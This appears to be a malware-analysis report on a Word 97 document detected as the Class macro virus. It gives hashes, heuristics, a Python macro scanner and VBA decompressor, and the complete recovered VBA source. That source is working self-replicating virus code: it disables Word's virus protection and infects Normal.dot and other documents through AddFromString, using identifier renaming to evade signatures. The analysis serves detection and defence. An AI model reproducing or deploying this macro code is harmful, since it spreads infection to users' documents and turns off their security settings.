Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34b364d538e93ae7…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 48.0 KB
Created: 1998-12-12 16:20:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5c71303a31853917f08adc37a8ec32eb
SHA-1: 89321f9485f6d4108ef3e3ce8b56ac155959db1f
SHA-256: 34b364d538e93ae73f229cd2319fb4ae1ba61ae842110aca1b73103b5169b999
Risk score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word 8.0 (Word 97) document whose VBA project defines Sub AutoOpen(), so the code runs as soon as the file is opened with macros enabled. The recovered source is a self-replicating macro virus, not a downloader: AutoOpen first switches off Options.VirusProtection, ConfirmConversions and SaveNormalPrompt so that Word neither warns about macros nor prompts when Normal.dot is modified, then reads the first code module of both the open document and the Normal template through ActiveDocument.VBProject and NormalTemplate.VBProject. Whichever side does not yet begin with a Sub is treated as clean and infected with CodeModule.AddFromString: the macro body is installed as AutoClose in Normal.dot (so every document closed afterwards is infected) or as AutoOpen in a clean document opened under an already infected template, after which the document is saved back over itself. Before infecting the template, QE896_JI08 generates random identifier names and JI08 rewrites the module line by line with CodeModule.Find and ReplaceLine, a simple polymorphic trick against string signatures; the random-looking names in the listing (PE8690, GL8530 and so on) are the result of earlier rounds of this renaming. Nothing in the recovered code contacts the network, starts a process or writes any file other than the document itself, so there is no download-and-execute capability in this sample. The ClamAV signature name (Doc.Trojan.Class-8) and the 1998 creation date are consistent with the Class family of Word 97 macro viruses, which used exactly this AutoOpen/AutoClose replication scheme. The legacy WordBasic auto-exec heuristic is redundant here, since a full VBA project was recovered (see the extracted artifact below).

Heuristics (5)

  • ClamAV: Doc.Trojan.Class-8 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-8
  • VBA macros detected [medium; 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The recovered module defines Sub AutoOpen(), which Word runs when the document is opened with macros enabled
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    The recovered module defines no Sub AutoClose; the only occurrence of the name is the string "Sub AutoClose()" that AutoOpen writes into the Normal template's code module, so this finding reflects the code the macro installs into Normal.dot rather than a second entry point in this file
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was in fact recovered, see the extracted artifact; treat this finding as redundant with OLE_VBA_AUTOOPEN.)
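The heuristics above and the behaviour described in the summary can be checked mechanically against recovered macro source. The following Python triage scanner is an added example, not code from this report's analyzer or from oletools: it runs a small rule set (auto-exec entry points, security-setting tampering, VBProject access, code injection with AddFromString, self-modification with ReplaceLine, auto-exec names hidden in string literals) over a constructed excerpt modelled on the AutoOpen code shown further down. Rule names, severities, verdict strings and the helper functions are my own choices, and the excerpt is abridged, not the full macros.bas.

```python
import re
from collections import namedtuple

# Constructed excerpt modelled on the AutoOpen code recovered from this sample
# (identifier names copied from the preview; abridged, not the full module).
SAMPLE_VBA = """Sub AutoOpen()
On Error Resume Next
Options.ConfirmConversions = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
PE8690 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
GL8530 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If DV094 = True Then RQ4058.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & "x")
If GL8530 <> 0 And PE8690 = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Private Sub JI08(SD8150, LD4177 As String)  'v1.0
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Do While .Find(LD4177, EN642, FK2681, FP2810, LM8433, True)
.replaceline EN642, strline
Loop
End With
End Sub
"""

Finding = namedtuple("Finding", "rule severity line text")

# (rule name, severity, regex). Matched case-insensitively because VBA
# identifiers are not case-sensitive (the sample itself writes .replaceline).
RULES = [
    ("auto_exec", "high",
     r"^\s*(?:Private\s+|Public\s+)?Sub\s+(AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|Document_Open|Document_Close)\b"),
    ("auto_exec_literal", "high",          # auto-exec name inside a string: code generation
     r'"[^"]*\bSub\s+(?:AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit)\b[^"]*"'),
    ("disable_virus_protection", "high", r"\bOptions\.VirusProtection\s*=\s*(?:0|False)\b"),
    ("suppress_prompts", "medium", r"\bOptions\.(?:SaveNormalPrompt|ConfirmConversions)\s*=\s*(?:0|False)\b"),
    ("vbproject_access", "high", r"\b(?:ActiveDocument|NormalTemplate)\.VBProject\.VBComponents\b"),
    ("code_injection", "critical", r"\.CodeModule\.(?:AddFromString|InsertLines|AddFromFile)\b"),
    ("self_modification", "high", r"\.(?:ReplaceLine|DeleteLines)\b"),
    ("normal_template", "medium", r"\bNormalTemplate\b"),
    ("save_in_place", "low", r"\bActiveDocument\.SaveAs\b"),
    ("error_suppression", "low", r"\bOn\s+Error\s+Resume\s+Next\b"),
]
COMPILED = [(name, sev, re.compile(rx, re.IGNORECASE)) for name, sev, rx in RULES]


def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside "..." literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan(vba_source):
    """Return one Finding per (rule, line) hit over the VBA source text."""
    findings = []
    for lineno, line in enumerate(vba_source.splitlines(), 1):
        code = strip_comment(line)
        for name, sev, rx in COMPILED:
            if rx.search(code):
                findings.append(Finding(name, sev, lineno, line.strip()))
    return findings


def auto_exec_procs(vba_source):
    """Names of auto-executing procedures actually defined in the module."""
    rx = COMPILED[0][2]
    return [m.group(1) for line in vba_source.splitlines() for m in [rx.search(line)] if m]


def classify(findings):
    """Coarse verdict: auto-exec plus VBProject write access is the macro-virus signature."""
    names = {f.rule for f in findings}
    if "auto_exec" not in names:
        return "no auto-exec macro"
    if {"vbproject_access", "code_injection"} <= names:
        return "self-replicating macro (Normal template infector)"
    if names & {"disable_virus_protection", "self_modification"}:
        return "suspicious auto-exec macro"
    return "auto-exec macro, review manually"


if __name__ == "__main__":
    found = scan(SAMPLE_VBA)
    for f in found:
        print(f"line {f.line:>3} {f.severity:<8} {f.rule:<26} {f.text[:60]}")
    print("entry points:", auto_exec_procs(SAMPLE_VBA))
    print("verdict:", classify(found))
```

The code_injection and vbproject_access rules are the ones worth keeping even in a noisy environment: legitimate documents almost never write to their own or the template's VBProject, and Word refuses the access unless "Trust access to the VBA project object model" is enabled, which is why the scanner ranks it above the auto-exec name alone.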

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9420 bytes
SHA-256: 89ff56a525321acf5992e53e6fcbf21a1c6d2a8920fc64491b33c506853e77ee
Detection: ClamAV: Doc.Trojan.Class-8
Obfuscation or payload: unlikely (analyzer verdict; the source drops no payload, but note the identifier-renaming routine QE896_JI08 in the listing below)
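"Decoded VBA source" here means the module text olevba recovered from the compressed Macros/VBA/ThisDocument stream. As an added example, not code from the report's analyzer or from oletools, the following Python implements the MS-OVBA compressed-container format (MS-OVBA section 2.4.1) that every VBA module stream uses: a decompressor, a literal-only encoder used to round-trip constructed input, and a hand-built container with a copy token. It assumes the caller has already located the compressed text inside the module stream (the text offset comes from the project's dir stream, which this example does not parse); the sample source bytes are constructed from the Attribute lines above.

```python
def decompress_vba(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer into the module's source bytes.

    Layout: 0x01 signature, then chunks. Each chunk starts with a 2-byte
    little-endian header: bits 0-11 = compressed chunk size - 3, bits 12-14 =
    0b011, bit 15 = 1 if the chunk is compressed. A compressed chunk is a run
    of [flag byte][8 tokens]; flag bit i set means token i is a 2-byte copy
    token (offset/length into already decompressed data), clear means one
    literal byte.
    """
    if not data or data[0] != 0x01:
        raise ValueError("missing MS-OVBA container signature 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        pos += 2
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature at offset %d" % (pos - 2))
        chunk_end = min(pos + (header & 0x0FFF) + 1, len(data))  # header already consumed
        chunk_start = len(out)                                  # DecompressedChunkStart
        if not header & 0x8000:                                 # raw chunk: plain bytes
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(data[pos])
                    pos += 1
                    continue
                token = int.from_bytes(data[pos:pos + 2], "little")
                pos += 2
                # The offset/length bit split depends on how much of this chunk
                # has been decompressed so far: max(ceil(log2(diff)), 4) offset bits.
                diff = len(out) - chunk_start
                bit_count = max((diff - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > diff:
                    raise ValueError("copy token reaches before the chunk start")
                for _ in range(length):            # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def compress_literals(raw: bytes) -> bytes:
    """Build a valid container using literal tokens only (no copy tokens).

    3640 literals plus 455 flag bytes is the most that fits in one 4096-byte chunk.
    """
    out = bytearray(b"\x01")
    for i in range(0, len(raw), 3640):
        piece = raw[i:i + 3640]
        body = bytearray()
        for j in range(0, len(piece), 8):
            body.append(0x00)                      # flag byte: all eight tokens are literals
            body += piece[j:j + 8]
        header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
        out += header.to_bytes(2, "little") + body
    return bytes(out)


# Constructed container: one compressed chunk holding the literals "ABC" and then a
# copy token (offset 3, length 3), which decompresses to b"ABCABC".
COPY_TOKEN_SAMPLE = bytes.fromhex("01 05b0 08 414243 0020")

# Constructed module text modelled on the recovered Attribute/AutoOpen lines.
SAMPLE_SOURCE = (b'Attribute VB_Name = "ThisDocument"\r\n'
                 b'Sub AutoOpen()\r\nOn Error Resume Next\r\n'
                 b'Options.VirusProtection = 0\r\nEnd Sub\r\n')


def roundtrip_ok(raw: bytes) -> bool:
    """Encode with literals only and check the decoder restores the input."""
    return decompress_vba(compress_literals(raw)) == raw


if __name__ == "__main__":
    print(decompress_vba(COPY_TOKEN_SAMPLE))
    print(decompress_vba(compress_literals(SAMPLE_SOURCE)).decode("latin-1"))
    print("round trip:", roundtrip_ok(SAMPLE_SOURCE))
```

The copy-token bit split is the part most hand-written decoders get wrong, and it is also why a corrupted or hostile module stream is worth fuzzing: an offset that points before the chunk start, or a chunk size that overruns the stream, must be rejected rather than indexed.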
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Options.ConfirmConversions = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
PE8690 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
GL8530 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set RQ4058 = ActiveDocument.VBProject.VBComponents.Item(1)
EM333 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set RQ4058 = NormalTemplate.VBProject.VBComponents.Item(1)
DV094 = True
Call QE896_JI08
End If
If DV094 <> True And EM333 <> True Then GoTo SA2266
If DV094 = True Then RQ4058.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, PE8690 - 1))
If EM333 = True Then RQ4058.CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, GL8530 - 1))
SA2266:
If GL8530 <> 0 And PE8690 = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Private Sub QE896_JI08()
On Error Resume Next
Randomize
Dim r1(1 To 14) As String
r1(1) = "EN642": r1(2) = "FK2681": r1(3) = "FP2810": r1(4) = "LM8433": r1(5) = "JI08": r1(6) = "PE8690"
r1(7) = "GL8530": r1(8) = "EM333":: r1(9) = "RQ4058": r1(10) = "DV094": r1(11) = "SA2266": r1(12) = "QE896": r1(13) = "LD4177": r1(14) = "SD8150"
For x = 1 To 14
a1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call JI08(a1, r1(x))
Next x
End Sub
Private Sub JI08(SD8150, LD4177 As String)  'v1.0
On Error Resume Next
Dim EN642 As Long: Dim FK2681 As Long: Dim FP2810 As Long: Dim LM8433 As Long
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
EN642 = 1: FK2681 = 1: FP2810 = .CountOfLines: LM8433 = Len(.Lines(.CountOfLines, 1))
Do While .Find(LD4177, EN642, FK2681, FP2810, LM8433, True)
strline = .Lines(EN642, 1)
strline = Left(strline, FK2681 - 1) & SD8150 & Mid(strline, LM8433)
.replaceline EN642, strline
EN642 = FP2810 + 1: FK2681 = 1:
FP2810 = .CountOfLines
LM8433 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Sub

' Processing file: /opt/analyzer/scan_staging/1b6a965840b046c386d4ac4061735373.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 14480 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St PE8690 
' Line #6:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St GL8530 
' Line #7:
' 	LitDI2 0x0001 
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Sub"
' 	Ne 
' 	IfBlock 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set RQ4058 
' Line #9:
' 	LitVarSpecial (True)
' 	St EM333 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
... (truncated)